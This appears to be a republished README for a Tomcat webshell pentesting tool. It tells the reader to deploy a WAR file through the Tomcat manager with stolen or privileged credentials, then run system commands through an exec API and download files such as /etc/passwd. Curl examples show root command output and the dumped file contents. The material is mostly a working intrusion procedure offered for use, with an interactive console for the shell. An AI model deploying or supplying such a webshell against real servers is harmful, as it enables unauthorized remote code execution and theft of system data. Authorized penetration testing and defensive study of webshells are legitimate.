Apache Tomcat webshell application for RCE
Apache Tomcat webshell application for RCE
A webshell application and interactive shell for pentesting Apache Tomcat servers.
Features
- Webshell plugin for Apache Tomcat.
- Execute system commands via an API with ?action=exec.
- Download files from the remote system to your attacking machine ?action=download.
Usage
Requirements: You need to have the credentials of a high privilege account of the Apache Tomcat server.
Step 1: Access the Tomcat manager and upload the webshell plugin
First of all, you will need to access the Apache Tomcat /manager page at http://127.0.0.1:10080/manager/html, and connect to it with a high privilege account of the Apache Tomcat server.
Then choose the WAR file of the webshell plugin and click on “Deploy”:
And the application is deployed:
Step 2.1: Executing commands
You can now execute commands by sending a GET or POST request to http://127.0.0.1:10080/webshell/api with action=exec&cmd=id:
$ curl -X POST ‘http://127.0.0.1:10080/webshell/api‘ –data “action=exec&cmd=id“ {“stdout“:“uid=0(root) gid=0(root) groups=0(root)\n“,“stderr“:““,“exec“:[“/bin/bash“,“-c“,“id“]}
You can also access it by a GET request from a browser:
Step 2.2: Downloading files
You can also download remote files by sending a GET or POST request to http://127.0.0.1:10080/webshell/api with action=download&cmd=/etc/passwd:
[pastacode lang=”markup” message=”” highlight=”” provider=”manual” manual=”%24%20curl%20-X%20POST%20’http%3A%2F%2F127.0.0.1%3A10080%2Fwebshell%2Fapi’%20–data%20%22action%3Ddownload%26path%3D%2Fetc%2Fpasswd%22%20-o-%0Aroot%3Ax%3A0%3A0%3Aroot%3A%2Froot%3A%2Fbin%2Fbash%0Adaemon%3Ax%3A1%3A1%3Adaemon%3A%2Fusr%2Fsbin%3A%2Fusr%2Fsbin%2Fnologin%0Abin%3Ax%3A2%3A2%3Abin%3A%2Fbin%3A%2Fusr%2Fsbin%2Fnologin%0Asys%3Ax%3A3%3A3%3Asys%3A%2Fdev%3A%2Fusr%2Fsbin%2Fnologin%0Async%3Ax%3A4%3A65534%3Async%3A%2Fbin%3A%2Fbin%2Fsync%0Agames%3Ax%3A5%3A60%3Agames%3A%2Fusr%2Fgames%3A%2Fusr%2Fsbin%2Fnologin%0Aman%3Ax%3A6%3A12%3Aman%3A%2Fvar%2Fcache%2Fman%3A%2Fusr%2Fsbin%2Fnologin%0Alp%3Ax%3A7%3A7%3Alp%3A%2Fvar%2Fspool%2Flpd%3A%2Fusr%2Fsbin%2Fnologin%0Amail%3Ax%3A8%3A8%3Amail%3A%2Fvar%2Fmail%3A%2Fusr%2Fsbin%2Fnologin%0Anews%3Ax%3A9%3A9%3Anews%3A%2Fvar%2Fspool%2Fnews%3A%2Fusr%2Fsbin%2Fnologin%0Auucp%3Ax%3A10%3A10%3Auucp%3A%2Fvar%2Fspool%2Fuucp%3A%2Fusr%2Fsbin%2Fnologin%0Aproxy%3Ax%3A13%3A13%3Aproxy%3A%2Fbin%3A%2Fusr%2Fsbin%2Fnologin%0Awww-data%3Ax%3A33%3A33%3Awww-data%3A%2Fvar%2Fwww%3A%2Fusr%2Fsbin%2Fnologin%0Abackup%3Ax%3A34%3A34%3Abackup%3A%2Fvar%2Fbackups%3A%2Fusr%2Fsbin%2Fnologin%0Alist%3Ax%3A38%3A38%3AMailing%20List%20Manager%3A%2Fvar%2Flist%3A%2Fusr%2Fsbin%2Fnologin%0Airc%3Ax%3A39%3A39%3Aircd%3A%2Fvar%2Frun%2Fircd%3A%2Fusr%2Fsbin%2Fnologin%0Agnats%3Ax%3A41%3A41%3AGnats%20Bug-Reporting%20System%20(admin)%3A%2Fvar%2Flib%2Fgnats%3A%2Fusr%2Fsbin%2Fnologin%0Anobody%3Ax%3A65534%3A65534%3Anobody%3A%2Fnonexistent%3A%2Fusr%2Fsbin%2Fnologin%0A_apt%3Ax%3A100%3A65534%3A%3A%2Fnonexistent%3A%2Fusr%2Fsbin%2Fnologin”/]
Step 3: The interactive console
When your webshell is active, you can now use the interactive console.py to execute commands and download remote files.
Development
If you need to compile this plugin, you can use the docker image provided, simply type make to build your plugin present in the webshell folder. Output WAR files will be put in the ./webshell/dist/ folder.
Then if you need to test the plugin locally, you can start an Apache Tomcat instance with the test environment in ./test_env/.
Download
Support Our Threat Intelligence
If you find our technology report and cybersecurity news helpful, consider supporting our work.
Buy Me a Coffee
PayPal
